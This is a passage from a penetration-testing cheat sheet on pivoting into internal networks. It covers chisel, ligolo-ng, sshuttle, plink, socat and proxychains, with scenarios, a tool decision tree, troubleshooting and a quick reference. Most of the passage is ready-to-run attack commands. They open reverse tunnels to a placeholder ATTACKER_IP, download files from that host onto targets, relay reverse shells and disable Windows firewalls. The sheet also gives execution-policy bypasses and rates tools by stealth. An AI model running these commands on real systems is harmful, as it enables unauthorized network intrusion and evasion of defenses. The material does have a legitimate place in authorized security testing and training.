Setup chisel 1054 ./chisel server -p 8080 --reverse 1055 ./chisel client ATTACKER_IP:8080 R:1080:socks 1056 1057 # Configure Firefox SOCKS proxy: 1058 # Preferences -> Network Settings -> Manual proxy 1059 # SOCKS Host: 127.0.0.1, Port: 1080, SOCKS v5 1060 # Browse to http://192.168.5.50 1061 ``` 1062 1063 ### Scenario 8: RDP to Windows Machine in Internal Network 1064 1065 **Situation:** Windows Server at 10.10.50.10, need RDP access 1066 1067 **Solution 1: Through SOCKS Proxy** 1068 ```bash 1069 # Setup Chisel tunnel 1070 ./chisel server -p 8080 --reverse 1071 ./chisel client ATTACKER_IP:8080 R:1080:socks 1072 1073 # Use proxychains with RDP client 1074 proxychains4 xfreerdp /v:10.10.50.10 /u:administrator /p:password /cert-ignore 1075 ``` 1076 1077 **Solution 2: Direct Port Forward** 1078 ```bash 1079 # Chisel reverse port forward 1080 ./chisel client ATTACKER_IP:8080 R:3389:10.10.50.10:3389 1081 1082 # Direct RDP connection 1083 xfreerdp /v:127.0.0.1:3389 /u:administrator /p:password 1084 ``` 1085 1086 --- 1087 1088 ## Tool Selection Guide 1089 1090 ### When to Use Each Tool 1091 1092 #### Use LIGOLO-NG when: 1093 - You need full network access (scanning, multiple services) 1094 - Want transparent access without SOCKS/proxychains 1095 - Have ability to upload agent binary 1096 - Need clean, VPN-like experience 1097 - Working with multiple nested networks 1098 - Performance matters (faster than SOCKS) 1099 1100 #### Use CHISEL when: 1101 - Need quick SOCKS proxy setup 1102 - Working through HTTP-only egress 1103 - Want to forward specific ports 1104 - Can't use SSH 1105 - Need cross-platform support 1106 - Working on HTB/CTF (widely supported) 1107 1108 #### Use SSHUTTLE when: 1109 - Target already has SSH running 1110 - Don't want to upload any tools 1111 - Need quick, transparent VPN-like access 1112 - Working on Linux/Mac 1113 - Want simple solution without agents 1114 1115 #### Use PLINK when: 1116 - Target is Windows 1117 - SSH server available on attacker 1118 - Can't upload other tools (plink is well-known, less suspicious) 1119 - Need quick reverse tunnel 1120 - Working with older Windows systems 1121 1122 #### Use SOCAT when: 1123 - Need encrypted tunnels (OpenSSL) 1124 - Creating relay points 1125 - Upgrading reverse shells to TTY 1126 - Need UDP forwarding 1127 - Want flexibility for custom scenarios 1128 1129 #### Use NETCAT when: 1130 - Just need basic port forwarding 1131 - Creating simple relays 1132 - Quick file transfers 1133 - Testing connectivity 1134 - Available on target (often pre-installed) 1135 1136 #### Use PROXYCHAINS when: 1137 - Already have SOCKS proxy (Chisel, SSH) 1138 - Need to route tools that don't support proxies 1139 - Want to chain multiple proxies 1140 - Working with scanners/exploit tools 1141 1142 ### Decision Tree 1143 1144 ``` 1145 Do you have SSH access on target? 1146 ├── YES: Use SSHuttle (simplest) or SSH tunneling 1147 └── NO: Continue... 1148 1149 Can you upload custom binaries? 1150 ├── YES: Continue... 1151 │ ├── Need VPN-like full network access? 1152 │ │ └── YES: Use Ligolo-ng (best performance) 1153 │ └── Need SOCKS proxy or port forward? 1154 │ └── YES: Use Chisel (most versatile) 1155 └── NO: Continue... 1156 ├── Windows target? 1157 │ ├── Plink available? -> Use Plink 1158 │ └── Use netsh portproxy (built-in) 1159 └── Linux/Unix target? 1160 ├── Netcat available? -> Use Netcat relay 1161 ├── Socat available? -> Use Socat 1162 └── Bash only? -> Use /dev/tcp relay 1163 ``` 1164 1165 ### Performance Comparison 1166 1167 | Tool | Speed | Latency | Resource Usage | Stealth | 1168 |------|-------|---------|----------------|---------| 1169 | Ligolo-ng | Excellent | Low | Low | High | 1170 | SSHuttle | Very Good | Low | Low | Very High | 1171 | Chisel | Good | Medium | Low | Medium | 1172 | SSH Tunnels | Very Good | Low | Low | Very High | 1173 | Socat | Good | Low | Very Low | High | 1174 | Netcat | Fair | Medium | Very Low | Medium | 1175 1176 --- 1177 1178 ## Troubleshooting 1179 1180 ### Chisel Issues 1181 1182 **Problem: Client connects but SOCKS proxy doesn't work** 1183 ```bash 1184 # Check if server is running with --reverse flag 1185 ./chisel server -p 8080 --reverse 1186 1187 # Verify SOCKS port is listening on attacker 1188 ss -tlnp | grep 1080 1189 1190 # Test SOCKS proxy 1191 curl --socks5 127.0.0.1:1080 http://internal-host 1192 ``` 1193 1194 **Problem: Connection refused / Can't connect** 1195 ```bash 1196 # Check firewall on attacker 1197 sudo ufw allow 8080/tcp 1198 1199 # Verify chisel is listening 1200 ss -tlnp | grep 8080 1201 1202 # Try different port (maybe 8080 is blocked) 1203 ./chisel server -p 443 --reverse 1204 ``` 1205 1206 ### Ligolo-ng Issues 1207 1208 **Problem: TUN interface not created** 1209 ```bash 1210 # Linux - create manually 1211 sudo ip tuntap add user $(whoami) mode tun ligolo 1212 sudo ip link set ligolo up 1213 1214 # Check if interface exists 1215 ip addr show ligolo 1216 1217 # macOS - install tuntap 1218 brew install --cask tuntap 1219 ``` 1220 1221 **Problem: Can't add routes / routes not working** 1222 ```bash 1223 # Check if tunnel is started 1224 # In ligolo console: start 1225 1226 # Verify route 1227 ip route | grep ligolo 1228 1229 # Check if interface is UP 1230 ip link show ligolo 1231 1232 # Try deleting and re-adding route 1233 sudo ip route del 10.10.10.0/24 dev ligolo 1234 sudo ip route add 10.10.10.0/24 dev ligolo 1235 ``` 1236 1237 **Problem: Agent won't connect** 1238 ```bash 1239 # Check firewall 1240 sudo ufw allow 11601/tcp 1241 1242 # Verify proxy is listening 1243 ss -tlnp | grep 11601 1244 1245 # Try binding to specific IP 1246 ./proxy -selfcert -laddr 0.0.0.0:11601 1247 1248 # On agent, try explicit bind 1249 ./agent -connect ATTACKER_IP:11601 -ignore-cert -bind 0.0.0.0 1250 ``` 1251 1252 ### SSH / SSHuttle Issues 1253 1254 **Problem: SSHuttle connection drops** 1255 ```bash 1256 # Use --no-latency-control 1257 sshuttle -r user@host 10.10.10.0/24 --no-latency-control 1258 1259 # Check SSH connection stability 1260 ssh user@host 'while true; do date; sleep 5; done' 1261 ``` 1262 1263 **Problem: SSH password authentication failed** 1264 ```bash 1265 # Enable password auth on SSH server 1266 sudo vim /etc/ssh/sshd_config 1267 # Set: PasswordAuthentication yes 1268 sudo systemctl restart sshd 1269 ``` 1270 1271 ### Proxychains Issues 1272 1273 **Problem: DNS leaks / DNS not working** 1274 ```bash 1275 # In /etc/proxychains4.conf, ensure: 1276 proxy_dns 1277 1278 # Or add to config: 1279 proxy_dns_old # Use old method if new one fails 1280 ``` 1281 1282 **Problem: Tool doesn't work with proxychains** 1283 ```bash 1284 # Some tools don't support SOCKS proxying 1285 # Workaround: Use Ligolo-ng or SSHuttle instead 1286 1287 # For nmap, always use: 1288 proxychains4 nmap -sT -Pn target 1289 # -sT: TCP connect (required) 1290 # -Pn: Skip ping (ICMP doesn't work through SOCKS) 1291 ``` 1292 1293 **Problem: "ERROR: ld.so: object 'libproxychains.so.3'"** 1294 ```bash 1295 # Find correct library 1296 find /usr -name "libproxychains*" 1297 1298 # Update config with correct path 1299 sudo vim /etc/proxychains4.conf 1300 # Update: /usr/lib/libproxychains4.so (or wherever it is) 1301 ``` 1302 1303 ### Windows Specific Issues 1304 1305 **Problem: PowerShell execution policy blocks scripts** 1306 ```powershell 1307 # Bypass execution policy 1308 powershell -ExecutionPolicy Bypass -File script.ps1 1309 1310 # Or set for current session 1311 Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass 1312 ``` 1313 1314 **Problem: Windows Firewall blocks tunneling tools** 1315 ```cmd 1316 # Disable firewall (if you have admin) 1317 netsh advfirewall set allprofiles state off 1318 1319 # Or add specific rule 1320 netsh advfirewall firewall add rule name="Chisel" dir=in action=allow program="C:\Temp\chisel.exe" 1321 ``` 1322 1323 **Problem: Plink asks to cache host key (breaks automation)** 1324 ```cmd 1325 # Auto-accept with echo 1326 echo y | plink.exe -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password 1327 1328 # Or use -batch flag (doesn't prompt) 1329 plink.exe -batch -R 9999:127.0.0.1:80 user@ATTACKER_IP -pw password 1330 ``` 1331 1332 ### General Networking Issues 1333 1334 **Problem: Can't reach internal network after setting up tunnel** 1335 ```bash 1336 # Check routing table 1337 ip route # Linux 1338 route print # Windows 1339 netstat -nr # macOS 1340 1341 # Verify tunnel interface is UP 1342 ip addr show 1343 1344 # Test connectivity 1345 ping INTERNAL_IP 1346 traceroute INTERNAL_IP 1347 1348 # Check if packet forwarding is enabled (Linux) 1349 sysctl net.ipv4.ip_forward # Should be 1 1350 sudo sysctl -w net.ipv4.ip_forward=1 1351 ``` 1352 1353 **Problem: Slow tunnel performance** 1354 ```bash 1355 # For SSH-based tunnels, enable compression 1356 ssh -C -D 1080 user@host 1357 1358 # For Chisel, try different port (avoid port 80/443 if proxy interferes) 1359 ./chisel server -p 9999 --reverse 1360 1361 # For Ligolo-ng, check MTU settings 1362 # Reduce MTU if needed 1363 sudo ip link set ligolo mtu 1400 1364 ``` 1365 1366 **Problem: Firewall blocks outbound connections** 1367 ```bash 1368 # Try common allowed ports 1369 # 80 (HTTP), 443 (HTTPS), 53 (DNS), 22 (SSH) 1370 1371 # Chisel over HTTPS port 1372 ./chisel server -p 443 --reverse 1373 1374 # Ligolo-ng over HTTPS 1375 ./proxy -selfcert -laddr 0.0.0.0:443 1376 1377 # SSH over 443 1378 ssh -p 443 user@host 1379 ``` 1380 1381 --- 1382 1383 ## Quick Command Reference 1384 1385 ### Most Common Commands 1386 1387 ```bash 1388 # Quick SOCKS proxy with Chisel 1389 ./chisel server -p 8080 --reverse # Attacker 1390 ./chisel client ATTACKER_IP:8080 R:1080:socks # Target 1391 1392 # Ligolo-ng full tunnel 1393 ./proxy -selfcert -laddr 0.0.0.0:11601 -autoroute # Attacker 1394 ./agent -connect ATTACKER_IP:11601 -ignore-cert # Target 1395 # Then: session 1 -> start 1396 1397 # SSHuttle VPN 1398 sshuttle -r user@pivot 10.0.0.0/8 --dns -vv 1399 1400 # Reverse port forward 1401 ssh -R 8080:localhost:80 user@attacker # SSH 1402 ./chisel client ATTACKER_IP:8080 R:8080:localhost:80 # Chisel 1403 plink.exe -R 8080:localhost:80 user@attacker -pw pass # Plink 1404 1405 # Local port forward 1406 ssh -L 8080:internal-host:80 user@pivot 1407 ./chisel client ATTACKER_IP:8080 L:8080:internal-host:80 1408 1409 # Dynamic SOCKS 1410 ssh -D 1080 user@pivot 1411 ./chisel client ATTACKER_IP:8080 1080:socks 1412 1413 # Using proxychains 1414 proxychains4 nmap -sT -Pn 10.10.10.0/24 1415 proxychains4 firefox 1416 proxychains4 msfconsole 1417 1418 # File transfer 1419 python3 -m http.server 8000 # Attacker 1420 wget http://ATTACKER_IP:8000/file -O /tmp/file # Target Linux 1421 iwr http://ATTACKER_IP:8000/file -o C:\Temp\file # Target Windows 1422 1423 # Reverse shell relay with socat 1424 socat TCP-LISTEN:4444,fork TCP:ATTACKER_IP:4444 # Pivot 1425 # Victim connects to pivot:4444 1426 ``` 1427 1428 --- 1429 1430 ## Additional Resources 1431 1432 ### Port Reference 1433 ``` 1434 Common Tunnel Ports: 1435 - 11601: Ligolo-ng default 1436 - 8080: Chisel default (HTTP alternative) 1437 - 1080: SOCKS proxy standard 1438 - 8888: Alternative HTTP forward 1439 - 9050: Tor SOCKS proxy 1440 - 22: SSH 1441 ``` 1442 1443 ### Testing Connectivity 1444 ```bash 1445 # Check if port is open 1446 nc -zv TARGET_IP PORT 1447 1448 # Check HTTP service 1449 curl -I http://TARGET_IP:PORT 1450 1451 # Check SOCKS proxy 1452 curl --socks5 127.0.0.1:1080 http://target 1453 1454 # Test route 1455 ping TARGET_IP 1456 traceroute TARGET_IP 1457 1458 # Check listening ports on local 1459 ss -tlnp # Linux 1460 netstat -an | find "LISTEN" # Windows 1461 ``` 1462 1463 ### Useful Aliases (Add to ~/.bashrc or ~/.zshrc) 1464 ```bash 1465 # Quick HTTP server 1466 alias serve='python3 -m http.server 8000' 1467 1468 # Quick SOCKS with Chisel 1469 alias chisel-server='~/tools/chisel/chisel server -p 8080 --reverse' 1470 1471 # Proxychains shortcut 1472 alias pc='proxychains4 -q' 1473 1474 # Quick nmap through proxy 1475 alias pcnmap='proxychains4 nmap -sT -Pn' 1476 ``` 1477 1478 --- 1479 1480 **Created for Security Testing & Authorized Penetration Testing Only**